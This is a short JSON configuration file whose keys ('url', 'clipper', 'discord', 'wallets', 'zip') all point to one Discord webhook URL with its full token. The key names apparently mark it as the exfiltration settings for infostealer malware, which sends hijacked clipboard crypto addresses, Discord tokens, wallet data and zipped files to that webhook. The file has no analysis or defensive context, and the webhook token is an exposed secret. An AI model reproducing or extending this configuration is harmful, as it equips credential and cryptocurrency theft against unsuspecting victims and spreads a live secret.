{
    "url": "https://discord.com/api/webhooks/987081922343739433/8LiashxFAMR5oWLgby-Igm_PyjLHb8N8q8oRwAieODNuSWRofEeZFiy5R57db1b9rDNu",
    "clipper": "https://discord.com/api/webhooks/987081922343739433/8LiashxFAMR5oWLgby-Igm_PyjLHb8N8q8oRwAieODNuSWRofEeZFiy5R57db1b9rDNu",
    "discord": "https://discord.com/api/webhooks/987081922343739433/8LiashxFAMR5oWLgby-Igm_PyjLHb8N8q8oRwAieODNuSWRofEeZFiy5R57db1b9rDNu",
    "wallets": "https://discord.com/api/webhooks/987081922343739433/8LiashxFAMR5oWLgby-Igm_PyjLHb8N8q8oRwAieODNuSWRofEeZFiy5R57db1b9rDNu",
    "zip": "https://discord.com/api/webhooks/987081922343739433/8LiashxFAMR5oWLgby-Igm_PyjLHb8N8q8oRwAieODNuSWRofEeZFiy5R57db1b9rDNu"
}
